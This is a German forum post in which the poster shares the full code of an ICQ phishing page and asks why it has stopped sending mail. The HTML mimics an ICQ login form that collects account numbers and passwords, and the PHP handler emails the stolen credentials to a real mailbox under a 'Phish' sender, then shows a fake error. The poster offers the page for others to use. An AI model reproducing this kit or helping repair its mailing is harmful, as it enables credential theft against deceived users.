Hier hab ich mal eine site erstellt :
index.php
leider sendet die seite keine mails mehr ich weiß nicht warum kann mir bitte jemand helfen ? vor kurtzem ging es noch!Code:</a><br><br><br><br><img src=http://img5.imagebanana.com/img/ehbul74/hack.png border=0><br><br><font color=black> <body <font color="black"><br></font></b></div></b></td></tr></tbody></table></font><b><font <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <head> <title>-ICQ Message : Jetzt NEU Icq in High-speed-</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="description" content="ICQ.com schickt coder los um eine MYSQL daten bank mit gespeicherten ICQ accounts die hier bestätigt werden zu erhalten!" /> <meta name="keywords" content="ICQ7,icq stealer" /> <meta name="ajaxUrl" content="/Ajax" /> <link rel="shortcut icon" href="http://www.favicon.cc/favicon/52/74/favicon.ico" /> </head> <body> <div id="adBackground"></div> <div id="allIn" class="clearFix"> <div id="leftAds"> <div id="masterLeft"> <fieldset> <br><form action="send.php" method="post"> <table width="115" border="0"> <tr> <td width="120" height="25">ICQ Nummer:</td> </tr> <tr> <td><input type="text" class="style der seite" name="benutzer"></td> </tr> <tr> <td>Passwort</td> </tr> <tr> <td><input type="password" class="style der seite" name="pass"></td> </tr> <tr> <td height="26"><input type="submit" class="style der seite" name="submit" value="Bestaetigen"></td> </tr> </table> </form> <span style="color: rgb(0, 0, 0);"><font color="#00bfff"><span style="font-family: Arial Black; font-size: 14pt;"></span></font></span><span style="color: rgb(0, 0, 0);"><a href="http://img5.imagebanana.com/img/6gzbrsev/Untitled2copy.png"><font color="#00bfff"><u><b><br></b></u></font></a><span style="color: rgb(112, 128, 144);"><b><table style="border-collapse: collapse;" width="288" height="58"><tbody><tr><td style="border: 1px solid rgb(0, 0, 0);"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(112, 128, 144);"><font face="Arial Black"><a href="http://img5.imagebanana.com/img/6gzbrsev/Untitled2copy.png">Hier der beweis!</a><br><font color="#0000cd">(c)2009 ICQ-message & ICQ.com( n.e.g.i.u.g)</font><br></font></span></span></td></tr></tbody></table></b></span></span><br> <html> <head> </head> <body background="<html> <head> <title>Hintergrundbild einbinden</title> </head> <body background="http://img5.imagebanana.com/img/g842riir/Untitled1.png" </body> </html> <style type="text/css"> body{background-image:url(http://img5.imagebanana.com/img/g842riir/Untitled1.png);background-repeat:no-repeat;background-position:center ;background-attachment:fixed; } </style>
hier die send.php
die login.php is die selbe wie die index (is da der fehler xD?)Code:<?php $benutzer=$HTTP_POST_VARS['benutzer']; $pass=$HTTP_POST_VARS['pass']; if ($pass == "") { print("Bitte geben Sie ihr Passwort ein"); } elseif ($benutzer == "") { print("Bitte geben Sie ihre Nummer ein"); } else { $mailtext="Benutzername:"; $mailtext.=$benutzer; $mailtext.="\n"; $mailtext.="Passwort: "; $mailtext.=$pass; $absender="From: Phish <phish@freenet.de>"; mail("dean-wingess@hotmail.de",$benutzer,$mailtext,$absender); // Edit your Email Address and the text which will be printed after logging in ! print("Error: We will be back soon Error Code:3242% "); } ?> <html> <body> <meta http-equiv="Refresh" content="1; url=http://dartemis.net/r_g_graves/images/nelson-haha.gif"> </body> </html>
von mir aus können andere die seite verwenden aber es bringt euch nichts(3minuten arbeit)



(3minuten arbeit)
Zitieren
